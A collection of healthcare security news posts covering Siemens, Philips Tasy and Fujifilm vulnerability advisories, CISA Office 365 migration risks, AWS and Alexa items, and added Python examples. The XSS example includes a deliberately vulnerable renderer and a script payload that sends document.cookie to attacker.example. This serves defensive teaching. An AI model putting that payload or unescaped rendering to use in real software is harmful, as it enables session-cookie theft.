Healthcare Technology Vendor News

Vulnerabilities Identified in Siemens Sinamics Perfect Harmony Drives and Scalance Access Points

Siemens has disclosed one critical, three high-severity and one medium-severity vulnerability in the Scalance W1750D direct access point. The vulnerabilities can be exploited remotely and require a low level of skill to exploit.

If exploited, an attacker could gain access to the W1750D device and execute arbitrary code within its underlying operating system, gain access to sensitive information, perform administrative actions on the device, and expose session cookies for an administrative session.

The vulnerabilities are present in all versions prior to 8.4.0.1.

CVE-2018-7084 is a critical command injection vulnerability in the web interface that allows arbitrary system commands to be executed on the underlying operating system: files could be copied, the configuration read, the device rebooted, and files written or deleted. Its CVSSv3 base score of 9.8 out of 10 reflects that exploitation requires neither authentication nor user interaction.

CVE-2019-7083 is a high-severity information exposure vulnerability that could allow an attacker to access core dumps of previously crashed processes via the web interface of the device. The vulnerability has been assigned a CVSSv3 base score of 7.5 out of 10.

CVE-2019-16417 is a high-severity information exposure vulnerability that could allow an attacker to access recently cached configuration commands by sending a specially crafted URL to the web interface. The vulnerability has been assigned a CVSSv3 base score of 7.5 out of 10.

CVE-2019-7082 is a high-severity command injection vulnerability that could allow an authenticated administrative user to execute arbitrary commands on the underlying operating system. The vulnerability has been assigned a CVSSv3 base score of 7.2 out of 10.

CVE-2019-7064 is a medium-severity cross-site scripting vulnerability that could allow an attacker to perform administrative actions on a vulnerable device or expose admin session cookies by tricking an administrator into clicking a malicious hyperlink. The vulnerability has been assigned a CVSSv3 base score of 6.4 out of 10.

Siemens has fixed all five flaws in version 8.4.0.1 and advises users to upgrade as soon as possible.

If the update cannot be applied, the following workarounds will reduce the risk of the vulnerabilities being exploited:

  • Restrict access to the web-based management interface to the internal or VPN network.
  • Do not browse other websites and do not click on external links while authenticated to the administrative web interface.
  • Apply the cell protection concept and implement defense in depth.

Siemens Sinamics Perfect Harmony GH180 Fieldbus Network Vulnerability

A high-severity vulnerability has been identified in the Siemens Sinamics Perfect Harmony GH180 Fieldbus Network. The flaw is remotely exploitable, requires a low level of skill to exploit, and requires no privileges or user interaction.

The flaw is present in the following medium voltage converters:

  • Siemens Sinamics Perfect Harmony GH180 with NXG I control and GH180 with NXG II control (MLFBs 6SR2...-, 6SR3...-, 6SR4...-): all versions with option G21, G22, G23, G26, G28, G31, G32, G38, G43 or G46.

The flaw is an improper input validation issue: specially crafted packets sent to the device cause it to restart, a denial-of-service condition that compromises the availability of the affected system. Network access to the device is required to exploit the vulnerability.

The vulnerability – CVE-2019-6574 – has been assigned a CVSSv3 base score of 7.5 out of 10.

To correct the flaw, users should upgrade to NXGpro control. If the upgrade is not possible, the following workarounds have been suggested:

  • Disable the fieldbus parameter read/write functionality.
  • Apply the cell protection concept and implement defense in depth.

Siemens Sinamics Perfect Harmony GH180 Drives NXG I and NXG II Vulnerability

A high-severity vulnerability has been identified in Siemens Sinamics Perfect Harmony GH180 Drives (NXG I and NXG II). The flaw is remotely exploitable, requires a low level of skill to exploit, and requires no privileges or user interaction.

If exploited, an individual with access to the Ethernet Modbus Interface could trigger a denial-of-service condition by exhausting the available connections, compromising the availability of the affected system.

The vulnerability is present in all versions of GH180 with NXG I control and GH180 with NXG II control (MLFBs 6SR2...-, 6SR3...-, 6SR4...-).

The vulnerability – CVE-2019-6578 – has been assigned a CVSSv3 base score of 7.5 out of 10.

To correct the flaw, users should upgrade to NXGpro control. If the upgrade is not possible, the following workarounds have been suggested:

  • Install a protocol bridge that isolates the networks and eliminates direct connections to the Ethernet Modbus Interface.
  • Apply the cell protection concept and implement defense in depth.

The post Vulnerabilities Identified in Siemens Sinamics Perfect Harmony Drives and Scalance Access Points appeared first on HIPAA Journal.

DHS Issues Security Best Practices to Mitigate Risks Associated with Office 365 Migrations


The DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has issued a new analysis report highlighting some of the common risks and vulnerabilities associated with transitioning from on-premises mail services to cloud-based services such as Microsoft Office 365. The report details best practices for managing those risks and preventing user and mailbox compromises.

Many healthcare organizations have realized the benefits of transitioning to cloud-based email services yet lack the in-house expertise to manage their migrations. Many have used third-party service providers to migrate their email services to Office 365. CISA notes that use of third parties to manage Office 365 migrations has led to an increase in security incidents.

Over the past 6 months, CISA has had several engagements with customers who used third-party service providers to manage their migrations and found a range of Office 365 configurations that lowered the organizations’ security posture and left them vulnerable to phishing and other cyberattacks.

CISA notes that the majority of those organizations didn’t have a dedicated IT security team that was focused on cloud security and, as a result, vulnerabilities went unnoticed. In some cases, the organization experienced mailbox compromises as a result of the risks and vulnerabilities introduced during Office 365 migrations.

According to the AR19-133A analysis report, the most common vulnerabilities identified, each of which could easily lead to a data breach, are:

Multifactor authentication not enabled for Azure Active Directory (AD) Global Administrators – Despite these accounts having the highest level of privileges at the tenant level, MFA is not enabled on them by default.

Disabled mailbox auditing – The failure to implement mailbox auditing means actions taken by mailbox owners, delegates, and administrators will not be logged. This will hamper investigations into mailbox activity and potential data breaches. Customers who implemented Office 365 prior to 2019 are required to explicitly enable mailbox auditing.

Password sync enabled – With this setting enabled, the password from on-premises AD overwrites the password in Azure AD. If an on-premises account was compromised prior to the migration to Office 365, the attacker’s access carries over to the cloud account when the sync occurs, allowing lateral movement into the cloud.

Legacy protocols do not support modern authentication – Office 365 uses Azure AD for authentication to Exchange Online; however, several legacy protocols (e.g. POP3, IMAP, and SMTP) used to authenticate to Exchange Online do not support modern authentication mechanisms such as MFA. Accounts reachable through these protocols are protected by a password alone, which greatly increases the attack surface.

CISA suggests several best practices to adopt to ensure that migrating to Office 365 does not result in the lowering of an organization’s security posture:

  • Implement multi-factor authentication – It is the best mitigation technique to protect against credential theft via phishing attacks
  • Ensure audit logging is configured in the Security and Compliance Center
  • Ensure mailbox auditing is activated for each user
  • Ensure Azure AD is correctly configured prior to migrating users to Office 365
  • Ensure legacy email protocols are disabled or are limited to specific users
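The two conditions the report singles out, Global Administrators signing in with a password alone and mail clients still using legacy (basic) authentication, both show up in Azure AD sign-in records. The script below is an added example, not code from CISA or Microsoft: it runs over constructed sign-in records that follow the field names of the Microsoft Graph signIn resource (userPrincipalName, clientAppUsed, authenticationRequirement, status.errorCode), and the GLOBAL_ADMINS set stands in for what the tenant’s directory role membership actually returns.

```python
"""Flag MFA-less Global Administrator sign-ins and legacy-protocol sign-ins.

Added example (not from AR19-133A). Records are constructed in the shape of the
Microsoft Graph `signIn` resource; GLOBAL_ADMINS is a constructed role membership.
"""
from __future__ import annotations

import json
from collections import Counter
from dataclasses import dataclass

# clientAppUsed values that mean basic/legacy authentication was used. All of them
# authenticate with a password alone, so MFA cannot be enforced on these sign-ins.
LEGACY_CLIENT_APPS = {
    "Authenticated SMTP", "Exchange ActiveSync", "Exchange Web Services", "IMAP4",
    "MAPI Over HTTP", "Offline Address Book", "Other clients",
    "Outlook Anywhere (RPC over HTTP)", "POP3", "Reporting Web Services",
}

# Constructed: accounts holding the Global Administrator role in this tenant.
GLOBAL_ADMINS = {"admin@contoso.example", "breakglass@contoso.example"}

# Constructed sign-in records, one JSON object per line (the export format of the
# portal's sign-in log and of the Graph /auditLogs/signIns endpoint, trimmed down).
SAMPLE_SIGN_INS_JSONL = """\
{"userPrincipalName": "alice@contoso.example", "clientAppUsed": "Browser", "authenticationRequirement": "multiFactorAuthentication", "status": {"errorCode": 0}}
{"userPrincipalName": "bob@contoso.example", "clientAppUsed": "IMAP4", "authenticationRequirement": "singleFactorAuthentication", "status": {"errorCode": 0}}
{"userPrincipalName": "Admin@contoso.example", "clientAppUsed": "Browser", "authenticationRequirement": "singleFactorAuthentication", "status": {"errorCode": 0}}
{"userPrincipalName": "admin@contoso.example", "clientAppUsed": "Authenticated SMTP", "authenticationRequirement": "singleFactorAuthentication", "status": {"errorCode": 50126}}
{"userPrincipalName": "breakglass@contoso.example", "clientAppUsed": "Mobile Apps and Desktop clients", "authenticationRequirement": "multiFactorAuthentication", "status": {"errorCode": 0}}
"""


@dataclass(frozen=True)
class Finding:
    user: str
    rule: str    # "legacy-auth" or "admin-without-mfa"
    detail: str


def load_jsonl(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze_sign_ins(records: list[dict], admins: set[str] = GLOBAL_ADMINS) -> list[Finding]:
    findings: list[Finding] = []
    for r in records:
        user = r.get("userPrincipalName", "").lower()   # UPNs are case-insensitive
        app = r.get("clientAppUsed", "")
        succeeded = r.get("status", {}).get("errorCode") == 0  # errorCode 0 is success
        if app in LEGACY_CLIENT_APPS:
            outcome = "succeeded" if succeeded else "failed"
            findings.append(Finding(user, "legacy-auth", f"{app} sign-in {outcome}"))
        if (succeeded and user in admins
                and r.get("authenticationRequirement") != "multiFactorAuthentication"):
            findings.append(Finding(user, "admin-without-mfa",
                                    f"Global Administrator signed in via {app} with a password only"))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count of findings per rule, e.g. {'legacy-auth': 2, 'admin-without-mfa': 1}."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    results = analyze_sign_ins(load_jsonl(SAMPLE_SIGN_INS_JSONL))
    for f in results:
        print(f"{f.rule:18} {f.user:30} {f.detail}")
    print(summarize(results))
```

A failed legacy-protocol sign-in (the Authenticated SMTP line with a credential error) is still reported: password spraying against POP/IMAP/SMTP is exactly the traffic that disabling those protocols removes. Once legacy protocols are disabled tenant-wide, the legacy-auth rule should go quiet; any remaining hits point at an exemption that needs reviewing.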


Vulnerability Identified in Philips Tasy EMR

A vulnerability has been identified in the Philips Tasy EMR information system. An attacker who exploits it could send unexpected input to the system, potentially allowing arbitrary code execution, altered information flow, loss of system integrity, and unauthorized access to patient information.

The flaw was identified by security researcher Rafael Honorato who reported the vulnerability to Philips, which reported the flaw to the National Cybersecurity and Communications Integration Center. An advisory about the vulnerability was issued by ICS-CERT on April 30, 2019.

The vulnerability – CVE-2019-6562 – is present in Tasy EMR versions 3.02.174 and earlier, and mostly affects healthcare providers in Brazil and Mexico. The vulnerability has not been exploited in the wild and no public exploits have been identified.

The cross-site scripting vulnerability is caused by improper neutralization of user-controllable input during web page generation. It requires only a low level of skill to exploit, but the attacker must be on the customer’s site or connected to it via VPN. Although the flaw can expose information, it has been assigned a CVSS v3 base score of 4.1 out of 10.
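The defect class here, and in the Scalance W1750D administrative interface XSS above that can expose an administrator’s session cookie, is the same: input is copied into generated HTML without being encoded for the context it lands in. The following is an added example, not Philips or Siemens code; the page template, the query parameter and the cookie name are invented. render_unsafe reproduces the bug, render_safe applies context-aware output encoding, and session_cookie_header shows the cookie attributes that keep a session cookie out of reach of any script that does get injected.

```python
"""Reflected XSS (CWE-79): vulnerable rendering beside its hardened form.

Added example; not from the Tasy EMR or Scalance advisories. Template, parameter
and cookie names are invented for illustration.
"""
import html
from urllib.parse import quote

# A minimal results page. The query appears twice: as HTML element text and inside a
# URL in an href attribute. Those are two different encoding contexts.
TEMPLATE = (
    "<html><body>\n"
    "<h1>Patient search</h1>\n"
    "<p>Results for: {text}</p>\n"
    '<a href="/search?q={url}">Search again</a>\n'
    "</body></html>\n"
)


def render_unsafe(query: str) -> str:
    """Improper neutralization during web page generation: input is trusted as markup."""
    return TEMPLATE.format(text=query, url=query)


def render_safe(query: str) -> str:
    """Encode for the destination context: HTML-escape element text (quote=True also
    covers attribute values), percent-encode the URL query component (safe="" so that
    even '/' and ':' are encoded, which also defuses javascript: URLs)."""
    return TEMPLATE.format(text=html.escape(query, quote=True), url=quote(query, safe=""))


def session_cookie_header(session_id: str) -> str:
    """Issue the session cookie so injected script cannot read or replay it easily:
    HttpOnly keeps it out of document.cookie, Secure keeps it off plaintext HTTP,
    SameSite=Lax keeps it off cross-site requests started from a malicious link."""
    return f"Set-Cookie: SESSIONID={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


# Constructed payload of the kind delivered through a malicious hyperlink: when the
# page renders it, the victim's cookies are sent to an attacker-controlled host.
PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie_header("0123456789abcdef"))
```

Output encoding is the fix for the flaw itself; the cookie attributes limit the damage of the next such flaw, which is why the Scalance workaround (not browsing elsewhere while authenticated) is only a stopgap.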

Philips has advised all users of Tasy EMR to update to one of the three most recent versions of the software as soon as possible and to ensure Service Packs are applied promptly. Philips will patch hosted solutions automatically; users who have installed Tasy EMR on-premises will receive alerts when new software versions are released.

Additionally, Philips recommends following the instructions in the product configuration manual and ensuring that Tasy EMR is only accessible over the internet via a VPN.


Critical Vulnerability Identified in Fujifilm Computed Radiography Cassette Readers

Two vulnerabilities have been identified in Fujifilm computed radiography cassette readers. If exploited, an attacker could gain access to the operating system, execute arbitrary code, render the devices inoperable, alter functionality, and cause image loss.

The vulnerabilities are present in the following Fujifilm computed radiography cassette readers:

  • CR-IR 357 FCR Capsula X
  • CR-IR 357 FCR Carbon X
  • CR-IR 357 FCR XC-2

The most serious vulnerability – CVE-2019-10950 – is due to improper access controls on the telnet service. A remote attacker with a relatively low level of skill could exploit it to gain access to the operating system, execute code remotely, and affect the functionality of the device. The vulnerability has been assigned a CVSS v3 base score of 9.8 out of 10. Telnet also carries credentials and commands in cleartext, so a telnet service reachable on a clinical network is a risk even once access controls are corrected.

The second vulnerability – CVE-2019-10948 – is due to uncontrolled resource consumption: a flood of TCP packets can exhaust the device’s resources in a denial-of-service (DoS) attack. If exploited, the device is rendered inoperable and a reboot is required to restore functionality. The vulnerability has been assigned a CVSS v3 base score of 7.5 out of 10.

The vulnerabilities were identified by Marc Ruef and Rocco Gagliardi of Scip AG.

To prevent exploitation of the vulnerabilities, users can configure the CR-IR-357 system with ‘Secure Host functionality.’ This configuration instructs the CR-IR-357 system to ignore network traffic other than from the IP address of the image acquisition console.

This mitigation will only be an option for users that have one image acquisition console using the CR-IR-357 Reader Unit. With this configuration activated, multiple image acquisition consoles cannot share the Reader Unit as network traffic will only be accepted from a single IP address. If Reader Unit sharing has been implemented, Fujifilm should be contacted for further information on other possible mitigations.

Users should also ensure that appropriate administrative and technical controls are implemented to prevent unauthorized devices and users from connecting to the network. Fujifilm also recommends segmenting the network or using a VLAN to segregate public traffic from the private network.


AWS Chief Technology Officer Allays Fears about Cloud Security and Talks about the Huge Potential of Alexa Voice Technology

Amazon Web Services’ chief technology officer, Werner Vogels, has been dispelling security myths about cloud computing at the Dublin Tech Summit in Ireland this week.

Concerns have been raised about the security of data stored in the cloud, especially following the discovery that 540 million Facebook records had been exposed on AWS, one of several high-profile data exposures involving AWS-stored data in the past 12 months. In that case the records had been left in publicly accessible storage by a third-party app developer, not exposed through a flaw in AWS itself.

Fears About Compliance and the Cloud

Companies required to comply with the General Data Protection Regulation (GDPR) must ensure that the personal data of EU citizens is secured and kept private and confidential. Since GDPR came into effect on May 25, 2018, the potential penalties for data exposures have increased significantly. It is therefore understandable that companies are concerned about storing data in the cloud rather than on on-premises infrastructure that they feel better able to secure.

Germany’s Federal Commissioner for Data Protection and Freedom of Information, Ulrich Kelber, spoke before Vogels at the Tech Summit and voiced his concerns about American cloud storage providers, stating that they should not be used for hosting police data as there was a risk of snooping. The commissioner was particularly concerned about the passing of the CLOUD Act in 2018, which could allow U.S. law enforcement to gain access to data stored by U.S. technology companies.

Many companies in the United States are also wary about using the cloud for storing sensitive data such as protected health information, and the potential for HIPAA violations. As is the case with GDPR, the penalties for data exposure can be severe and, for small healthcare organizations, potentially catastrophic.

Vogels explained that cloud security should not be a concern and storing data on AWS is perfectly secure. His advice to all AWS users is “encrypt everything,” but at a minimum, make sure that all personally identifiable information is encrypted.

Encryption helps companies meet the requirements of GDPR, HIPAA, and other federal and state regulations. As for the CLOUD Act, Vogels’ position is that if a technology company is served with a warrant for data that the AWS customer has encrypted using modern encryption standards, and only the customer holds the key to decrypt it, the data remains secure; any conversation about access is then between law enforcement and the customer, and AWS will not be involved. That argument holds only when the key genuinely never leaves the customer’s control, as with client-side encryption using customer-held keys; data encrypted with keys the provider holds and operates on the customer’s behalf is only as private as the provider’s own key-access controls.

Vogels also explained that AWS has improved its controls to make it harder for data to be exposed. Customer data is now closed off by default. It takes a deliberate action to remove AWS protections and make data publicly accessible, and when that happens prominent warnings are raised.

Vogels said, “We’re very strong believers that the best way to help our customers protect themselves from whatever bad actors you can imagine is to ensure encryption is as easy to use as any other digital service.” Encryption is offered through AWS to make securing sensitive data as easy as possible.

Voice Technology Has Huge Potential

Vogels also spoke about one potentially big area for Amazon, big even by Amazon’s standards. He said Amazon is not looking to invest in technologies that will add $100 million to the balance sheet; it is looking for billion-dollar-plus opportunities, and Alexa voice technology is a prime example.

Amazon Alexa is the leading voice technology and has already found uses in healthcare. HIPAA was something of a stumbling block as the regulations covering protected health information are strict, but Amazon has recently solved that problem. Amazon is offering business associate agreements to a select group of companies and has made sure that its voice tech can transfer data securely in a manner compliant with HIPAA Rules. Last week Amazon announced that six new healthcare skills had been launched that could be used in connection with PHI. The company will be collaborating further with healthcare organizations, although by invite only at this stage.

Skills have also been developed by WebMD which allow users to ask questions about their symptoms using voice commands rather than entering information on a website. These skills are just the tip of the iceberg and the potential uses of voice technology in healthcare are huge. In the not too distant future, Alexa could even be used by people to access healthcare information stored in their EHRs.

Vogels certainly believes voice technology is the way forward and thinks voice commands will be the main way that people interact with digital systems in the future.


Study Reveals How Well Consumers Feel Health Data is Protected

The results of a study on healthcare cybersecurity from the perspective of consumers have recently been published by cybersecurity firm Morphisec. More than 1,000 consumers were surveyed to obtain their opinions on healthcare cybersecurity, the healthcare threat landscape, how their personal health information is being targeted, and how well they feel their health information is protected.

The transition from paper records to electronic health records has improved efficiency and allows health information to be shared more easily, but vulnerabilities have been introduced that can be exploited by hackers.

Morphisec notes that cyberattacks on the healthcare industry occur at more than double the rate of attacks on other industry sectors. The volume of attacks and frequency that they are reported in the media undoubtedly affects how secure consumers believe their health records are.

Since 2009, more than 190 million healthcare records have been exposed or stolen, which is equivalent to 59% of the population of the United States, yet when consumers were asked if their providers have experienced a data breach, 54% did not know. 40% said no breach had occurred to their knowledge and only 6% said one of their providers has been affected. HIPAA requires notifications to be sent to consumers when their health records are exposed, but it would appear that many consumers feel they are not informed about data breaches.

Consumers Concerned About Privacy and Security of Health Data

When asked who is responsible for protecting health data, 51% of consumers felt it was a joint responsibility between consumers and their providers. Only 29% felt that it was the sole responsibility of their provider to keep health data private and confidential, and only 8% felt that keeping health data that had been shared with them private was their own responsibility.

As more and more healthcare providers give patients access to their health information through patient portals, and consumers are encouraged to obtain copies of their health data, it is not surprising that so many consumers feel the responsibility for protecting health data is shared. The use of patient portals has increased from 28% to 42% in the past 12 months, an increase of 14 percentage points.

55% of consumers feel their health data is more secure when stored by providers. 45% believe that health information stored on personal electronic devices is more secure than data held by their providers. It is unclear whether consumers do not trust their providers to secure data, whether they think a cyberattack on a provider is more likely than an attack on them personally, or if they feel that there is little difference between their own security defenses and those of their providers.

What is clear is that consumers believe there are many weak links that need to be addressed, in particular web browser defenses, which almost a quarter of respondents (24.1%) felt was the weakest link in security. Around a fifth of respondents felt the weak point was endpoint defenses (21%), email phishing defenses (20.9%) or patient portal defenses (20.1%). Only 13.8% felt medical device security was the weakest link.

Healthcare Organizations Only Achieving a Baseline Level of Security

HIPAA requires healthcare organizations to implement security measures to keep protected health information private and confidential. Heavy fines can be issued if a data breach is experienced and providers are discovered to have failed to implement appropriate defenses. HIPAA has certainly helped to improve the standard of security across the healthcare industry as a whole, but many providers have only implemented security defenses to ensure compliance with HIPAA. Once the minimum standard of security has been achieved, the checkbox is ticked, and little is done to further reduce risk.

Through compliance, risk can be reduced, but HIPAA compliance does not mean cyberattacks will not succeed nor that attacks have been made difficult for hackers.

“With nearly 90% of health organization CIOs indicating they purchase cybersecurity software to comply with HIPAA, rather than to reduce threat risk, consumers have a right to be worried about the cyber defenses protecting their health data,” said Tom Bain, VP of Security Strategy at Morphisec. “Merely checking the box that cybersecurity defenses meet HIPAA requirements isn’t enough to protect healthcare organizations today from advanced and zero-day attacks from FIN6 and other sophisticated attackers.”

That sentiment has been echoed by many industry professionals who believe that the threat of financial penalties is stopping healthcare organizations from improving their defenses further. Many just achieve the minimum level of security to comply with HIPAA.

Several stakeholders have suggested a safe harbor should be established for healthcare providers who meet HIPAA security standards to ensure they are immune from financial penalties. With the threat of financial penalties gone, it is felt that healthcare organizations would be more likely to invest more heavily in cybersecurity defenses.


Amazon Announces 6 New HIPAA Compliant Alexa Skills

Six new HIPAA compliant Alexa skills have been launched by Amazon that allow protected health information to be transmitted without violating HIPAA Rules.

The new HIPAA compliant Alexa skills were developed by six different companies that have participated in the Amazon Alexa healthcare program. The new skills allow patients to schedule appointments, find urgent care centers, receive updates from their care providers, receive their latest blood sugar reading, and check the status of their prescriptions.

This is not the first time that healthcare Alexa skills have been developed, but a stumbling block has been the requirements of the HIPAA Privacy Rule, which limit the use of voice technology with protected health information. Now, thanks to HIPAA compliant data transfers, the voice assistant can be used by a select group of healthcare organizations to communicate PHI without violating the HIPAA Privacy Rule.

Amazon has stated that it plans to work with many other developers through an invite-only program to develop new skills to use within its HIPAA-eligible environment. Amazon is offering those organizations business associate agreements to meet HIPAA requirements. The initial roll-out has been limited to six new HIPAA compliant Alexa skills as detailed below:

New HIPAA Compliant Alexa Skills

The purpose of the new skills is to allow patients, caregivers, and health plan members to use Amazon Alexa to manage their healthcare at home through voice commands. The skills make it easier for patients to perform healthcare-related tasks, access their health data, and interact with their providers.

The six new HIPAA compliant Alexa skills are:

Express Scripts

Members of the Express Scripts pharmacy services organization can check the status of a home delivery prescription and can ask Alexa to send notifications when prescriptions have been shipped and when they arrive at their door.

Cigna Health Today

Employees who have been enrolled in a Cigna health plan can use this Alexa skill to check wellness program goals, receive health tips, and access further information on rewards.

My Children’s Enhanced Recovery After Surgery (ERAS)

Parents and caregivers of children enrolled in Boston Children’s Hospital’s ERAS program can send updates to their care teams on recovery progress. Care teams can also send information on post-op appointments and pre- and post-op guidance. Initially, the skill is being used in relation to cardiac surgery patients, although the program will be expanded in the near future.

Livongo Blood Sugar Lookup

Participants in Livongo’s Diabetes Program can query their latest blood sugar reading from their device, check blood sugar monitoring trends such as their weekly average reading, and receive personalized health tips through their Alexa device.

Atrium Health

Atrium Health’s new Alexa skill allows patients to find urgent care locations near them and schedule same-day appointments, find out about opening hours, and current waiting times. Initially the Alexa skill is being offered to customers in North and South Carolina.

Swedish Health Connect

Providence St. Joseph Health has created an Alexa skill that allows patients to find Swedish Express Care Clinics in their vicinity and schedule same day appointments at 37 of its locations on the west coast.


Webinar: April 4, 2019: Email Security, DMARC, and Sandboxing

The healthcare industry is particularly vulnerable to phishing attacks and successful attacks commonly result in significant data breaches. It is now something of a rarity for a week to pass without a healthcare phishing attack being reported.

While healthcare organizations are providing security awareness training to staff and are using email security solutions, those defenses are not always effective.

To improve understanding of why advanced attacks are managing to evade detection by traditional email security solutions, email security solution provider TitanHQ is hosting a webinar.

During the webinar TitanHQ will explain about the threat from phishing and how organizations can protect themselves and their customers/patients. The webinar will also explain how two new features of TitanHQ’s SpamTitan email security solution – DMARC authentication and sandboxing – can protect against advanced email threats, zero-day attacks, malware, phishing, and spoofing.

Webinar Details:

Date : Thursday, April 4th, 2019

Time: 12pm EST

Duration: 30 minutes


Disclaimer

This is not a sponsored event. HIPAA Journal has no business relationship with the event holder. HIPAA Journal promotes events that might be of interest to its readers. You may submit your event information on our contact page. HIPAA Journal does not accept payment for promoting events.


Amazon Launches New System for De-identifying Medical Images

Amazon has announced that it has developed a new system that automatically removes identifying protected health information (PHI) from medical images so that patients cannot be identified from them.

Medical images often have patients’ protected health information stored as text within the image, including the patient’s name, date of birth, age, and other metrics. Before the images can be used for research, authorization must be obtained from the patient or all identifying data must be permanently removed. Removing PHI from images requires a manual check and alteration of the image to redact the PHI, which is an expensive and time-consuming process, especially when large numbers of images must be de-identified.

The new system uses Amazon’s Rekognition machine-learning service, which can detect and extract text from images, along with the location of each piece of text. The extracted text is then fed through Amazon Comprehend Medical to identify any PHI. Python code then redacts the PHI by blacking out the regions of the image where the flagged text was found. The system works on PNG, JPEG, and DICOM images.

The service returns a confidence score for each detected entity, which indicates how confident it is that the entity was correctly identified and can form the basis of reviews to make sure that information has been correctly identified. The desired confidence threshold, from 0.00 to 1.00, can be set by the user; setting it to 0.00 redacts all text the service identifies.

Amazon says the system allows healthcare organizations to de-identify large numbers of images quickly and inexpensively, and notes that it can be used to batch process thousands or millions of images. Once an image has been processed and the location of PHI has been identified, a Lambda function can be attached so that PHI is automatically redacted from new images as they are uploaded to an Amazon S3 bucket.
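The pipeline just described has one non-obvious step: Comprehend Medical returns PHI as character offsets into the text it was given, while Rekognition returns bounding boxes per detected line, so the offsets have to be mapped back onto lines before anything can be blacked out. The code below is an added example, not Amazon’s published code. The two boto3 calls are isolated in detect_with_aws (which needs network access and credentials and is not exercised offline); everything else is pure and runs over constructed responses that follow the two services’ response shapes (TextDetections with Geometry.BoundingBox expressed as fractions of the image, Entities with BeginOffset, EndOffset and Score). The sample radiograph text and its coordinates are invented.

```python
"""Map Comprehend Medical PHI offsets back to Rekognition text boxes and redact them.

Added example, not Amazon's code. SAMPLE_LINES / SAMPLE_ENTITIES are constructed in
the shape of rekognition.detect_text and comprehendmedical.detect_phi responses.
"""
from __future__ import annotations


def join_lines(lines: list[dict]) -> tuple[str, list[tuple[int, int, dict]]]:
    """Concatenate LINE detections (in Id order) with newlines, keeping each line's
    character span so entity offsets from Comprehend Medical map back to a box."""
    parts, spans, pos = [], [], 0
    for d in sorted(lines, key=lambda d: d["Id"]):
        text = d["DetectedText"]
        spans.append((pos, pos + len(text), d))
        parts.append(text)
        pos += len(text) + 1  # +1 for the "\n" separator
    return "\n".join(parts), spans


def detect_with_aws(image_bytes: bytes, region: str = "us-east-1") -> tuple[list[dict], list[dict]]:
    """The two service calls (network; not exercised offline)."""
    import boto3  # imported lazily so the module loads without boto3 installed

    rek = boto3.client("rekognition", region_name=region)
    cm = boto3.client("comprehendmedical", region_name=region)
    detections = rek.detect_text(Image={"Bytes": image_bytes})["TextDetections"]
    lines = [d for d in detections if d["Type"] == "LINE"]
    joined, _ = join_lines(lines)
    entities = cm.detect_phi(Text=joined)["Entities"] if joined else []
    return lines, entities


def select_redaction_boxes(lines, entities, min_score, width, height):
    """Pixel rectangles (left, top, right, bottom), right/bottom exclusive, to black out.

    min_score of 0.0 redacts every detected line, as the article notes; otherwise a
    line is redacted when it overlaps a PHI entity whose Score is at least min_score."""
    _, spans = join_lines(lines)
    boxes = []
    for start, end, d in spans:
        hit = min_score <= 0.0 or any(
            e["Score"] >= min_score and e["BeginOffset"] < end and e["EndOffset"] > start
            for e in entities
        )
        if hit:
            bb = d["Geometry"]["BoundingBox"]  # Left/Top/Width/Height as image fractions
            boxes.append((round(bb["Left"] * width), round(bb["Top"] * height),
                          round((bb["Left"] + bb["Width"]) * width),
                          round((bb["Top"] + bb["Height"]) * height)))
    return boxes


def redact(pixels: list[list[int]], boxes) -> list[list[int]]:
    """Black out boxes in a row-major grayscale image given as lists (with PIL this is
    ImageDraw.Draw(image).rectangle(box, fill=0)); boxes are clipped to the image."""
    for left, top, right, bottom in boxes:
        for y in range(max(top, 0), min(bottom, len(pixels))):
            for x in range(max(left, 0), min(right, len(pixels[y]))):
                pixels[y][x] = 0
    return pixels


# Constructed: what the two services would return for a 200x100 radiograph with the
# patient name and date of birth burned into the pixels, plus a harmless view label.
SAMPLE_LINES = [
    {"Id": 0, "Type": "LINE", "DetectedText": "JOHN DOE", "Confidence": 99.1,
     "Geometry": {"BoundingBox": {"Left": 0.05, "Top": 0.05, "Width": 0.30, "Height": 0.10}}},
    {"Id": 1, "Type": "LINE", "DetectedText": "DOB 01/02/1950", "Confidence": 98.4,
     "Geometry": {"BoundingBox": {"Left": 0.05, "Top": 0.20, "Width": 0.40, "Height": 0.10}}},
    {"Id": 2, "Type": "LINE", "DetectedText": "CHEST PA", "Confidence": 97.0,
     "Geometry": {"BoundingBox": {"Left": 0.50, "Top": 0.80, "Width": 0.30, "Height": 0.10}}},
]
SAMPLE_ENTITIES = [  # offsets are into join_lines(SAMPLE_LINES)[0]
    {"Id": 0, "BeginOffset": 0, "EndOffset": 8, "Score": 0.99, "Text": "JOHN DOE",
     "Category": "PROTECTED_HEALTH_INFORMATION", "Type": "NAME"},
    {"Id": 1, "BeginOffset": 13, "EndOffset": 23, "Score": 0.97, "Text": "01/02/1950",
     "Category": "PROTECTED_HEALTH_INFORMATION", "Type": "DATE"},
]

if __name__ == "__main__":
    boxes = select_redaction_boxes(SAMPLE_LINES, SAMPLE_ENTITIES, 0.90, 200, 100)
    print(boxes)
    image = redact([[255] * 200 for _ in range(100)], boxes)
    print(sum(px == 0 for row in image for px in row), "pixels blacked out")
```

Two things to check in a real deployment: redact the whole line rather than just the entity’s characters, because Rekognition’s WORD-level boxes are less reliable than its LINE boxes and a partially redacted name is still identifying; and remember that this handles only text rendered into the pixels, so PHI in DICOM header tags needs its own de-identification step before the file leaves the organization.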
